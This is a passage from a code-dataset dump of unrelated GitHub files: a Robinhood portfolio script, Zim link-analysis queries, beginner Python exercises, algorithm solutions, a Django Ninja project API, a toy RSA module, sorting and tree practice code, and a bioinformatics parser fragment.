'))\n\n\ndef main():\n\tparser = argparse.ArgumentParser(description='Display information for a Robinhood account.')\n\n\tparser.add_argument('--categories_file', type=argparse.FileType('r'),\n\t\tdefault='stock_categories.csv', help='location of the stock categories CSV file')\n\tparser.add_argument('--output_csv_location',\n\t\tdefault='stock_holdings_{}.csv'.format(_START_TIMESTAMP),\n\t\thelp='location to save current stock data')\n\tparser.add_argument('--username', help='account username')\n\targs = parser.parse_args()\n\n\t# repeatedly ask for credentials + login until successful\n\twhile True:\n\t\tif args.username:\n\t\t\tusername = args.username\n\t\telse:\n\t\t\tusername = input('Robinhood Username: ')\n\n\t\tpassword = getpass.getpass(prompt='Robinhood Password: ')\n\t\ttry:\n\t\t\tr = RobinhoodManager(username, password)\n\t\texcept Exception as e:\n\t\t\tprint(\"Failed to login to Robinhood, try again. (Error:{})\".format(e))\n\t\telse:\n\t\t\tbreak\n\n\tsc = stock_categories.StockCategories(args.categories_file)\n\n\n\t## Print basic portfolio stats\n\tprint_section_header(\"Robinhood\")\n\tprint(f\"Equity: {r.portfolio_readable_string()}\")\n\tprint(\"Reserved cash: ${:.0f} / ${:.0f} ({:.0f}%)\".format(\n\t\tr.portfolio_dictionary['cash_amount'],\n\t\tsc.get_minimum_cash_amount(),\n\t\t100.0 * r.portfolio_dictionary['cash_amount'] / sc.get_minimum_cash_amount()))\n\n\n\t## Print portfolio positions in a table\n\tprint_section_header(\"Positions\")\n\tr.positions_readable_table()\n\twith open(args.output_csv_location, 'w') as handle:\n\t\tprint(r.positions_csv(), file=handle)\n\n\n\t## Print categories used to balance portfolio\n\tprint_section_header(\"Portfolio balance\")\n\tprint(\"{:<30}{:>7}{:>7}{:>7} {}\".format(\"Category\", \"Ideal\", \"Actual\", \"Needed\", \"Holdings\"))\n\tfor category in sc.get_categories():\n\t\tallocation_to_category = 0\n\t\tstocks_in_category = sc.get_tickers_in_category(category.name)\n\t\tfor ticker in stocks_in_category:\n\t\t\tif ticker.name == \"Cash\":\n\t\t\t\tallocation_to_category = r.portfolio_dictionary['cash_amount'] - sc.get_minimum_cash_amount()\n\t\t\t\tif allocation_to_category < 0:\n\t\t\t\t\t# if cash allocation is negative (less cash then reserved amount)\n\t\t\t\t\tallocation_to_category = 0\n\t\t\telse:\n\t\t\t\ttry:\n\t\t\t\t\tposition = r.positions_dictionary[ticker.name]\n\t\t\t\texcept KeyError:\n\t\t\t\t\tpass # ticker not in portfolio; skip\n\t\t\t\telse:\n\t\t\t\t\tallocation_to_category += position[\"total_value\"] / len(ticker.categories)\n\n\t\tactual_allocation_percentage = 100.0 * allocation_to_category / r.portfolio_dictionary['equity']\n\t\tprint(\"{:<30}{:>7}{:>7}{:>7} {}\".format(\n\t\t\tcategory.name,\n\t\t\t\"{:.1f}%\".format(category.allocation_percentage),\n\t\t\t\"{:.1f}%\".format(actual_allocation_percentage),\n\t\t\t\"{:.1f}%\".format(category.allocation_percentage - actual_allocation_percentage),\n\t\t\t\" \".join([t.name for t in stocks_in_category])))\n\tprint()\n\n\t## Print warnings/notifications\n\tuncategorized_tickers = []\n\tfor ticker_name in r.positions_dictionary:\n\t\ttry:\n\t\t\tsc.get_categories_of_stock_ticker(ticker_name)\n\t\texcept stock_categories.TickerNotFoundError:\n\t\t\tuncategorized_tickers.append(ticker_name)\n\tif len(uncategorized_tickers) > 0:\n\t\tprint_section_header(\"Warnings\")\n\t\tlogging.warning(f\"Some tickers are not categorized: {', '.join(uncategorized_tickers)}\")\n\n\n\nif __name__ == 
\"__main__\":\n\tmain()","repo_name":"g0tmk/robinhood-checker","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20554508870","text":"from zim.notebook.index.links import LINK_DIR_FORWARD, LINK_DIR_BACKWARD, LINK_DIR_BOTH\n\ndef _source_target(dir):\n\tassert dir in (LINK_DIR_FORWARD, LINK_DIR_BACKWARD)\n\tif dir == LINK_DIR_FORWARD:\n\t\treturn ('source', 'target')\n\telse:\n\t\treturn ('target', 'source')\n\n\ndef sort_by_number_of_links(notebook, dir):\n\tsource, target = _source_target(dir)\n\treturn notebook.links.db.execute('''\n\t\tSELECT count({target}), pages.name FROM links\n\t\tJOIN pages ON links.{source}=pages.id\n\t\tGROUP BY {source}\n\t\tORDER BY count({target}) DESC\n\t'''.format(source=source, target=target))\n\n\ndef compare_by_links(notebook, dir, page1=None):\n\tsource, target = _source_target(dir)\n\tif page1 is None:\n\t\t# Select all pages that have any links, sorted by number of links\n\t\tfor total, pageid, page1 in notebook.links.db.execute('''\n\t\t\tSELECT count({target}), {source}, pages.name FROM links\n\t\t\tJOIN pages ON links.{source}=pages.id\n\t\t\tGROUP BY {source}\n\t\t\tORDER BY count({target}) DESC\n\t\t'''.format(source=source, target=target)\n\t\t):\n\t\t\tfor match in _compare_by_links(notebook, dir, total, pageid, page1):\n\t\t\t\tyield match\n\telse:\n\t\trow1 = notebook.pages.lookup_by_pagename(page1)\n\t\tpageid = row1.id\n\t\ttotal, = notebook.links.db.execute(\n\t\t\t'SELECT count(*) FROM links WHERE {source}={page1}'.format(source=source, page1=pageid)\n\t\t).fetchone()\n\t\tfor match in _compare_by_links(notebook, dir, total, pageid, page1.name):\n\t\t\tyield match\n\n\ndef _compare_by_links(notebook, dir, total, pageid, page1):\n\t\tsource, target = _source_target(dir)\n\n\t\t# Now find all other pages that have a common link target\n\t\t# and group these by number of occurrences\n\t\tfor match, page2 in notebook.links.db.execute('''\n\t\t\tSELECT count({source}), pages.name FROM (\n\t\t\t\tSELECT source, target FROM links\n\t\t\t\tWHERE {target} IN (\n\t\t\t\t SELECT {target} FROM links WHERE {source} = {page1}\n\t\t\t\t) AND source <> target -- avoid self references\n\t\t\t) JOIN pages ON {source}=pages.id\n\t\t\tGROUP BY {source}\n\t\t\tORDER BY count({source}) DESC\n\t\t'''.format(source=source, target=target, page1=pageid)\n\t\t):\n\t\t\tif page2 != page1:\n\t\t\t\tyield total, match, page1, page2\n\n\ndef find_common_links(notebook, page1, page2, dir):\n\tsource, target = _source_target(dir)\n\trow1 = notebook.pages.lookup_by_pagename(page1)\n\trow2 = notebook.pages.lookup_by_pagename(page2)\n\treturn notebook.links.db.execute('''\n\t\tSELECT DISTINCT pages.name FROM links\n\t\tJOIN pages ON {target}=pages.id\n\t\tWHERE {target} IN (\n\t\t SELECT {target} FROM links WHERE {source} = {page1}\n\t\t) AND {target} IN (\n\t\t\tSELECT {target} FROM links WHERE {source} = {page2}\n\t\t) AND source <> target -- avoid self references\n\t'''.format(source=source, target=target, page1=row1.id, page2=row2.id))\n","repo_name":"jaap-karssenberg/linkanalysis","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":2676,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"38080646948","text":"# Crie um programa que leia duas notas de um aluno e calcule sua média,\n# mostrando uma mensagen no final, de acordo com a 
média atingida:\n \n# Média abaixo de 5.0: REPROVADO\n# Média entre 5.0 e 6.9: RECUPERAÇÃO\n# Média 7.0 ou superior: APROVADO\n\nalu1 = float(input(\" digite sua primeira nota: \"))\nalu2 = float(input(\" digite sua segunda nota: \"))\nmedia = (alu1 + alu2 ) / 2\n\nif media <= 5.0:\n print(\" Infelizmente você está REPROVADO!\")\nelif media <= 6.9:\n print(\" Você está de RECUPERAÇÃO!\")\nelse:\n print(\" Parabens você está APROVADO!\")\n \nprint(\" Sua média final é {:.1f}\". format(media))\n \n\n\n","repo_name":"JeanPierre29/Projeto-Python-Guanabara-","sub_path":"Python_Curso_em_Video Mundo_2/Aula12.py/Resposta_exercicio40.aula12.py","file_name":"Resposta_exercicio40.aula12.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3774568629","text":"\"\"\"\nGiven a string str, find length of the longest repeating subseequence such that the two subsequence don’t have same\nstring character at same position, i.e., any i’th character in the two subsequences shouldn’t have the same index in\nthe original string.\n\nInput:\nThe first line of input contains an integer T denoting the number of test cases. Then T test cases follow. The first\nline of each test case contains an integer N denoting the length of string str.\nThe second line of each test case contains the string str consisting only of lower case english alphabets.\nOutput:\nPrint the length of the longest repeating subsequence for each test case in a new line.\n\n\nConstraints:\n1<= T <=100\n1<= N <=1000\n\nExample:\nInput:\n2\n3\nabc\n5\naxxxy\n\nOutput:\n0\n2\n\"\"\"\n\ntCases = int(input())\nfor _ in range(tCases):\n n = int(input())\n s = input()\n dp = [[0 for x in range(n+1)] for y in range(n+1)]\n for i in range(1, n+1):\n for j in range(1, n+1):\n if i != j and s[i-1] == s[j-1]:\n dp[i][j] = 1+dp[i-1][j-1]\n else:\n dp[i][j] = max(dp[i-1][j], dp[i][j-1])\n print(dp[n][n])\n","repo_name":"amit-kr-debug/CP","sub_path":"Geeks for geeks/strings/Longest Repeating Subsequence.py","file_name":"Longest Repeating Subsequence.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"7580063112","text":"\"\"\"\r\n Activity 2: Python Programming - Math Tutor\r\n Submitted by: ADOR, Angelo\r\n HASHIM, Elizabeth Ann\r\n TOLENTINO, Jesse Ann\r\n Year & Section: BSIS-2AB-M\r\n\"\"\"\r\n\r\n#imports the random and os module.\r\nimport random \r\nimport os\r\n\r\n\"\"\"\r\n The code is a calculator that can add, subtract, multiply, and divide two numbers.\r\n \r\n :param x: the first number\r\n :param y: the second number\r\n :return: the result of the operation.\r\n\"\"\"\r\ndef add (x, y):\r\n return x + y\r\n\r\ndef subtract(x, y):\r\n return x - y \r\n\r\ndef multiply(x, y):\r\n return x * y\r\n\r\ndef divide(x, y):\r\n return x / y\r\n\r\nscore = 0\r\n\r\n# Asking the user to input a number between 1 and 4. If the user inputs a number between 1 and 4, it\r\n# will ask the user a question. 
If the user inputs a number that is not between 1 and 4, it will print\r\n# \"Invalid Input\".\r\nwhile True:\r\n os.system(\"cls\")\r\n print (\"MATH TUTOR\")\r\n print(\"1: Addition\\n2: Subtraction\\n3: Multiplication\\n4: Division\")\r\n choice = input(\"Enter your choice: \")\r\n if choice in ('1', '2', '3', '4'):\r\n if choice == '1':\r\n os.system(\"cls\")\r\n print(\"=== Addition ===\")\r\n # Asking the user how many problems they want to answer.\r\n probNum = int (input(\"\\nHow many problems?: \"))\r\n i = 0\r\n score = 0\r\n while i < probNum:\r\n # Generating random numbers from 0 to 9 and 2 to 10. Then it is adding the two\r\n # numbers.\r\n num1 = float(random.randint(0, 9))\r\n num2 = float(random.randrange(2, 10))\r\n num3 = add(num1, num2)\r\n print(\"\\nWhat is the sum of \" + str(num1) + \" and \" + str(num2))\r\n answer = float(input(\"Enter your answer: \"))\r\n # Checking if the user's answer is correct. If it is correct, it will print \"Correct\"\r\n # and add 1 to the score. If it is wrong, it will print \"Wrong! The correct answer is\"\r\n # and the correct answer.\r\n if num3 == answer:\r\n print(\"Correct\")\r\n score += 1\r\n else:\r\n print(\"Wrong! The correct answer is\", num3)\r\n i += 1\r\n\r\n elif choice == '2':\r\n os.system(\"cls\")\r\n print(\"=== Subtraction ===\")\r\n probNum = int (input(\"How many problems?: \"))\r\n i = 0\r\n while i < probNum:\r\n num1 = float(random.randint(0, 9))\r\n num2 = float(random.randrange(2, 10))\r\n num3 = subtract(num1, num2)\r\n print(\"\\nWhat is the difference of \" + str(num1) + \" and \" + str(num2))\r\n answer = float(input(\"Enter your answer: \"))\r\n if num3 == answer:\r\n print(\"Correct\")\r\n score += 1\r\n else:\r\n print(\"Wrong! The correct answer is\", num3)\r\n i += 1\r\n\r\n elif choice == '3':\r\n os.system(\"cls\")\r\n print(\"=== Multiplication ===\")\r\n probNum = int (input(\"How many problems?: \"))\r\n i = 0\r\n while i < probNum:\r\n num1 = float(random.randint(0, 9))\r\n num2 = float(random.randrange(2, 10))\r\n num3 = multiply(num1, num2)\r\n print(\"\\nWhat is the product of \" + str(num1) + \" and \" + str(num2))\r\n answer = float(input(\"Enter your answer: \"))\r\n if num3 == answer:\r\n print(\"Correct\")\r\n score += 1\r\n else:\r\n print(\"Wrong! The correct answer is\", num3)\r\n i += 1\r\n\r\n elif choice == '4':\r\n os.system(\"cls\")\r\n print(\"=== Division ===\")\r\n probNum = int (input(\"How many problems?: \"))\r\n i = 0\r\n while i < probNum:\r\n num1 = round(float(random.randint(0, 9)),2)\r\n num2 = round(float(random.randrange(2, 10)),2)\r\n num3 = divide(num1, num2)\r\n print(\"\\nWhat is the quotient of \" + str(num1) + \" and \" + str(num2))\r\n answer = float(input(\"Enter your answer: \"))\r\n if num3 == answer:\r\n print(\"Correct\")\r\n score += 1\r\n else:\r\n print(\"Wrong! The correct answer is\", num3)\r\n i += 1\r\n\r\n # Printing the user's score.\r\n print(\"\\nChallenge Done!! Your score is \" + str(score) + \"/\" + str(probNum))\r\n \r\n # Asking the user if they want to try again. If the user inputs \"no\", it will break the loop.\r\n try_again = input(\"\\nWant to try again? 
(Yes/No):\")\r\n decision = try_again.upper()\r\n if decision == \"NO\":\r\n break\r\nelse:\r\n print(\"Invalid Input\")","repo_name":"jesseanntolentino/Activity","sub_path":"Activity-2-Python-Programming-Math-Tutor.py","file_name":"Activity-2-Python-Programming-Math-Tutor.py","file_ext":"py","file_size_in_byte":4892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71666252587","text":"import hashlib\n\nfrom ninja import Router,File\nfrom django.forms.models import model_to_dict\nfrom backend.common import response,Error\nfrom backend.pagination import CustomPagination\nfrom ninja.pagination import paginate,PageNumberPagination #分页\nfrom typing import List\nfrom projects.api_schema import ProjectIn,ProjectOut\nfrom projects.models import Project\nfrom django.db.models import QuerySet\nfrom django.shortcuts import get_object_or_404\nfrom ninja.files import UploadedFile\nimport os\nfrom backend.settings import IMAGE_DIR\nfrom cases.models import Module, TestCase\nrouter = Router(tags=[\"projects\"])\n\n#创建项目接口\n@router.post(\"/create\",auth=None)\ndef create_project(request,data:ProjectIn):\n name = data.name\n describe = data.describe\n image = data.image\n\n project = Project.objects.filter(name=name)\n if len(project) > 0:\n return response(error=Error.PROJECT_NAME_EXIST)\n if data.image == \"\":\n data.image = \"default_project_image.png\"\n Project.objects.create(**data.dict())\n return response()\n\n#项目列表接口\n@router.get(\"/list\",auth=None,response=List[ProjectOut]) #自定义分页必须加response\n@paginate(CustomPagination)\ndef project_list(request):\n projects = Project.objects.filter(is_delete=False).all()\n return projects\n\n#获取详情接口\n@router.get(\"/{project_id}\",auth=None)\ndef project_detail(request,project_id:int):\n # try:\n # project = Project.objects.get(id=project_id)\n # except project.DoesNotExist:\n # return response(error=Error.PROJECT_NAME_EXIST)\n # else:\n project = get_object_or_404(Project,id=project_id)\n if project.is_delete is True:\n return response(error=Error.PROJECT_IS_DELETE)\n else:\n data = {\n \"id\": project.id,\n \"name\": project.name,\n \"describe\": project.describe,\n \"image\": project.image,\n \"create_time\":project.create_time\n }\n return response(result=data)\n\n#更新项目接口\n@router.put(\"/{project_id}\",auth=None)\ndef project_update(request,project_id:int,data:ProjectIn):\n project = get_object_or_404(Project,id=project_id)\n for atr,value in data.dict().items():\n setattr(project,atr,value)\n project.save()\n '''\n Project.objects.filter(id=project_id).update(image=data.image, name=data.describe,describe=data.describe)\n\n '''\n return response()\n\n#删除项目接口\n@router.delete(\"/{project_id}\",auth=None)\ndef project_delete(request,project_id:int):\n project = get_object_or_404(Project,id=project_id)\n project.is_delete = True\n project.save()\n return response()\n\n#图片上传接口\n\n@router.post(\"/upload/\",auth=None)\ndef upload(request, file: UploadedFile = File(...)):\n # data = file.read()\n # print(file.name)\n # print(file.size)\n file_type = [\"png\", \"jpg\", \"jpeg\", \"txt\"]\n type = file.name.split(\".\")[-1]\n if type not in file_type:\n return response(error=Error.FLIE_TYPE_ERROR)\n else:\n #文件名生成MD5\n file_md5 = hashlib.md5(bytes(file.name,encoding=\"utf-8\")).hexdigest()\n file_name = file_md5+\".\"+type\n # file_dir = os.path.dirname(os.path.abspath(__file__))\n print(\"重命名图片:\",file_name)\n upload_file= os.path.join(IMAGE_DIR,file_name)\n print(upload_file)\n with 
open(upload_file,\"wb+\") as f:\n for chunk in file.chunks(): #file.chunks()类似与file.read()\n f.write(chunk)\n return response(result={\"name\":file_name})\n\n@router.get(\"/{project_id}/cases\", auth=None)\ndef project_case_list(request, project_id: int):\n \"\"\"\n 通过项目ID 获取用例列表\n auth=None 该接口不需要认证\n \"\"\"\n project = get_object_or_404(Project, id=project_id)\n if project.is_delete is True:\n return response(error=Error.PROJECT_IS_DELETE)\n\n modules = Module.objects.filter(project_id=project.id)\n cases_list = []\n for m in modules:\n cases = TestCase.objects.filter(module_id=m.id)\n for c in cases:\n cases_list.append(model_to_dict(c))\n\n return response(result=cases_list)","repo_name":"PatrickHXH/Test-Development","sub_path":"ClassifiedProject/backend/projects/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":4139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1858508437","text":"'''\nChecking word frequency with dictionary\n'''\ndef read_file(filename):\n words =[]\n with open(\"data/\"+filename,'r') as f:\n for line in f:\n for word in line.split():\n words.append(word.strip('\".,?!'))\n return words\n\ndef word_frequencies(words):\n dict = {}\n for i in range(len(words)):\n if words[i] not in dict.keys():\n dict[words[i]] = 1\n else:\n dict[words[i]] += 1\n return dict\n\ndef print_dict(dict):\n for i in dict:\n print(f'Word:{i}, Frequency:{dict[i]}')\n\nwords = read_file(\"long_text.txt\")\nfrequencies = word_frequencies(words)\n\nprint_dict(frequencies)","repo_name":"TazoSepo/Python-Exercises","sub_path":"Basic 2/word_frequency.py","file_name":"word_frequency.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39149346285","text":"\"\"\"Confeccionar un programa con las siguientes funciones:\r\n1)Cargar el nombre de un empleado y su sueldo. 
Retornar una tupla con dichos valores\r\n2)Una función que reciba como parámetro dos tuplas con los nombres y sueldos de empleados y muestre el nombre del empleado con sueldo mayor.\r\nEn el bloque principal del programa llamar dos veces a la función de carga y seguidamente llamar a la función que muestra el nombre de empleado con sueldo mayor.\"\"\"\r\n\r\ndef CargarEmpleado(num):\r\n print(\"Datos el empleado numero [%s]\" % (num))\r\n nom=input(\"Introducir nombre del empleado: \")\r\n sueldo=0\r\n while sueldo<=100:\r\n sueldo=float(input(\"Introducir salario: \"))\r\n sueldo=round(sueldo, 2)\r\n if sueldo<=100:\r\n print(\"---> El sueldo debe de ser superior a 100.\")\r\n return (nom,sueldo)\r\n\r\ndef MejorPagado(empleado1, empleado2):\r\n print(\"\\nEmpleado con sueldo mayor\")\r\n if empleado1[1]>empleado2[1]:\r\n print(\"Nombre: %s\" % (empleado1[0]))\r\n print(\"Salario: %s\" % (empleado1[1]))\r\n else:\r\n if empleado1[1]= n:\n\t\traise Exception(\"Plain text too long\")\n\treturn int2bytes(quick_power(m, e, n))\n\n\ndef decrypt(ciphertext: bytes, private_key: 'Tuple (d, n)'):\n\td, n = private_key\n\tc = bytes2int(ciphertext)\n\tif c >= n:\n\t\traise Exception(\"Cipher text too long\")\n\treturn int2bytes(quick_power(c, d, n))\n\n\ndef generate_key_pair():\n\t\"\"\"\n\tRandomly generate a RSA key pair\n\tReturns ( public key, private key )\n\t\"\"\"\n\tp = generate_prime(2048)\n\tq = generate_prime(2048)\n\tn = p * q\n\te = 65537 # 65537 is prime.\n\n\tphi = (p - 1) * (q - 1)\n\td = invert(e, phi)\n\treturn (e, n), (d, n)\n\n\ndef get_signature(data_hash: bytes, private_key: 'Tuple (d, n)'):\n\treturn encrypt(data_hash, private_key)\n\n\ndef is_valid_signature(data_hash: bytes, signature, public_key: 'Tuple (e, n)'):\n\tif data_hash == decrypt(signature, public_key):\n\t\treturn True\n\treturn False\n","repo_name":"ChopperCP/MyCryptool","sub_path":"mycryptool/asymmetric/rsa.py","file_name":"rsa.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"1652841797","text":"import os\nimport csv\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\n\nMUTED=[\"#4878D0\", \"#EE854A\", \"#6ACC64\", \"#D65F5F\", \"#956CB4\", \"#8C613C\", \"#DC7EC0\", \"#797979\", \"#D5BB67\", \"#82C6E2\"]\nPAL = sns.color_palette(MUTED)\n\nclasses = []\nwith open('data/cookie_table/confusion_matrix.txt', 'r') as infile:\n for i, line in enumerate(infile):\n classes.append([])\n split = line.replace('[', '').replace(']', '').strip().split()\n for item in split:\n classes[i].append(int(item))\n\nsns.set(font_scale=4, style='ticks')\nplt.figure(figsize=(16, 12))\ng = sns.heatmap(classes, cbar=True, cmap='Blues')\nplt.tight_layout()\nsns.despine()\nplt.savefig('data/plots/confusion_matrix.pdf')\n","repo_name":"byron123t/cookie-tables","sub_path":"src/plot_confusion_matrix.py","file_name":"plot_confusion_matrix.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21149041744","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def longestZigZag(self, root: TreeNode) -> int:\n if root is None:\n return 0\n\n self.dp = {}\n self.dfs(root)\n\n result = 0\n for node in self.dp:\n result = max(result, self.dp[node][0], self.dp[node][1])\n\n return result - 
1\n\n def dfs(self, node: TreeNode):\n left = 1\n right = 1\n\n if node.left is not None:\n self.dfs(node.left)\n left += self.dp[node.left][1]\n\n if node.right is not None:\n self.dfs(node.right)\n right += self.dp[node.right][0]\n\n self.dp[node] = (left, right)\n","repo_name":"nhatsmrt/AlgorithmPractice","sub_path":"LeetCode/1372. Longest ZigZag Path in a Binary Tree/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"37"} +{"seq_id":"35669481586","text":"#tree\r\n\r\nclass Node:\r\n def __init__(self,val):\r\n self.data=val\r\n self.left=None\r\n self.right=None\r\n\r\nclass Tree:\r\n def __init__(self):\r\n self.root =None\r\n \r\n def createTree(self,val):\r\n if self.root is None:\r\n self.root=Node(val)\r\n else:\r\n temp=self.root\r\n print(\"val of temp\",val)\r\n while 1:\r\n if temp.data > val:\r\n if temp.left:\r\n temp=temp.left\r\n else:\r\n temp.left=Node(val)\r\n break\r\n elif temp.data < val:\r\n if temp.right:\r\n temp=temp.right\r\n else:\r\n temp.right = Node(val)\r\n break\r\n else:\r\n pass\r\n def inorderRec(self,temp):\r\n if temp:\r\n self.inorderRec(temp.left)\r\n print(temp.data)\r\n self.inorderRec(temp.right)\r\n \r\n def bfs(self):\r\n tempList=[self.root]\r\n self.root.level=0\r\n tempLevel=self.root.level\r\n bfsList=[]\r\n leftView=[self.root.data]\r\n while tempList:\r\n \r\n temp=tempList.pop(0)\r\n \r\n if temp.level > tempLevel:\r\n tempLevel +=1\r\n bfsList.append(\"\\n\")\r\n leftView.append(temp.data)\r\n \r\n bfsList.append(temp.data)\r\n #print(\" bfsList is : \" ,bfsList)\r\n if temp.left:\r\n temp.left.level = temp.level +1\r\n tempList.append(temp.left)\r\n #print(temp.left.data ,\" inserted \")\r\n \r\n if temp.right:\r\n temp.right.level = temp.level +1\r\n tempList.append(temp.right)\r\n #print(temp.right.data ,\" inserted \")\r\n \r\n print(bfsList)\r\n print(\"leftView \",leftView)\r\n \r\n \r\n \r\n\r\n def rightView(self):\r\n self.root.level=0\r\n tempList=[self.root]\r\n tempLevel=self.root.level\r\n rightViewList=[self.root.data]\r\n \r\n while tempList:\r\n temp =tempList.pop(0)\r\n \r\n if temp.level > tempLevel:\r\n tempLevel +=1\r\n rightViewList.append(temp.data)\r\n\r\n \r\n if temp.right:\r\n temp.right.level =temp.level+1\r\n tempList.append(temp.right)\r\n \r\n if temp.left:\r\n temp.left.level = temp.level+1\r\n tempList.append(temp.left)\r\n \r\n \r\n print(\"rightViewList\",rightViewList) \r\n \r\n def getHeight(self,temp):\r\n if temp:\r\n return 1 + max(self.getHeight(temp.left) ,self.getHeight(temp.right))\r\n else:\r\n return 0\r\n \r\n def getSize(self,temp):\r\n if temp:\r\n return 1+ self.getSize(temp.left) + self.getSize(temp.right)\r\n return 0\r\n \r\n def mirror(self,temp):\r\n if temp:\r\n self.mirror(temp.right)\r\n print(temp.data)\r\n self.mirror(temp.left)\r\n \r\n def maxSumAtWhatLevel(self):\r\n tempList=[self.root]\r\n self.root.level=0\r\n tempLevel=self.root.level\r\n tempMax=0\r\n sumAtLevel=0\r\n maxAtLevel=0\r\n #tempListAtCurrentLevel=[]\r\n while tempList:\r\n temp=tempList.pop(0)\r\n \r\n if temp.level > tempLevel:\r\n if sumAtLevel > tempMax:\r\n tempMax = sumAtLevel\r\n maxAtLevel = tempLevel\r\n tempLevel += 1\r\n sumAtLevel=0\r\n \r\n sumAtLevel += temp.data\r\n \r\n if temp.left:\r\n temp.left.level=temp.level+1\r\n tempList.append(temp.left)\r\n \r\n if temp.right:\r\n temp.right.level=temp.level +1\r\n tempList.append(temp.right)\r\n \r\n print(\"maxAtLevel : 
\",maxAtLevel, \"Max sum is :\",tempMax )\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\nbst=Tree()\r\nlist1=[5,4,63,7,2,8,1,9,0,-1,91]\r\nfor item in list1:\r\n bst.createTree(item)\r\n \r\nprint(\"inorder tree inorderRec :\") \r\nbst.inorderRec(bst.root) \r\nprint(\"bfs : \")\r\nbst.bfs()\r\n\r\n\r\nprint(\"rightView\")\r\nbst.rightView()\r\n\r\nprint(\"height\")\r\nprint(bst.getHeight(bst.root))\r\nprint(\"Size \")\r\nprint(bst.getSize(bst.root))\r\n\r\nprint(\"miror of inorder\")\r\nbst.mirror(bst.root)\r\n\r\n\r\nbst.maxSumAtWhatLevel()","repo_name":"atulanandnitt/questionsBank","sub_path":"advancedDataStructure/tree/practice_Tree1.py","file_name":"practice_Tree1.py","file_ext":"py","file_size_in_byte":4863,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34277393135","text":"# 堆排序\n\n\nclass HeapList(object):\n def __init__(self, _list=None):\n self.l = _list\n\n def swap(self, i, j):\n if i != j:\n self.l[i], self.l[j] = self.l[j], self.l[i]\n\n # 堆调整 s表示需要��整位置的序号, m表示堆的长度\n def heap_adjust(self, s, m):\n lis = self.l\n temp = lis[s]\n while s <= m/2 - 1:\n i = s * 2 + 1\n if i+1 < m:\n if lis[i] < lis[i+1]:\n i += 1\n if temp > lis[i]:\n break\n lis[s] = lis[i]\n s = i\n lis[s] = temp\n\n # 堆排序\n def heap_sort(self):\n length = len(self.l)\n # 循环进行堆调整,直至最后数组变为一个完全二叉堆\n j = int(length/2)-1\n while j >= 0:\n self.heap_adjust(j, length)\n j -= 1\n # 循环将堆顶与数组最后元素交换位置,使堆的长度减一,对堆进行调整\n i = length - 1\n while i >= 0:\n self.swap(0, i)\n self.heap_adjust(0, i)\n i -= 1\n\n def __str__(self):\n return str(self.l)\n\n\nif __name__ == '__main__':\n _list = HeapList([1, 13, 25, 12, 4, 8, 5, 6, 23, 7, 15, 3, 2])\n _list.heap_sort()\n print(_list)\n","repo_name":"namaiwa/sort_demo","sub_path":"heap_sort.py","file_name":"heap_sort.py","file_ext":"py","file_size_in_byte":1292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35518532169","text":"# coding: utf-8\n\nmetadata = dict(\n __name__ = \"about\",\n __version__ = \"5.2\",\n __license__ = \"MIT License\", \n __author__ = u\"Sébastien Boisgérault \",\n __url__ = \"https://github.com/boisgera/about\",\n __summary__ = \"Software Metadata for Humans\",\n __keywords__ = \"Python / 2, Python / 3, OS independent, software development\"\n)\n\nglobals().update(metadata)\n\n__all__ = list(metadata.keys())\n","repo_name":"raihanalam/CompanyWebApp","sub_path":"venv/Lib/site-packages/about/about.py","file_name":"about.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"70278567469","text":"import collections\n\nimport pypath.resources.urls as urls\nimport pypath.share.curl as curl\nimport pypath.utils.taxonomy as taxonomy\n\n\ndef gpcrdb_annotations(organism = 9606):\n \"\"\"\n :param int,str organism:\n Only human and mouse (9606 and 10090) are supported.\n \"\"\"\n \n \n GpcrdbAnnotation = collections.namedtuple(\n 'GpcrdbAnnotation',\n [\n 'gpcr_class',\n 'family',\n 'subfamily',\n ]\n )\n \n organism = taxonomy.ensure_ncbi_tax_id(organism)\n \n if organism not in (9606, 10090):\n \n return {}\n \n i_uniprot = 31 if organism == 10090 else 15\n \n url = urls.urls['gpcrdb']['families']\n \n c = curl.Curl(url, silent = False, large = True)\n \n result = collections.defaultdict(set)\n \n for line in c.result:\n \n if line[0] != ' ':\n \n cls = 
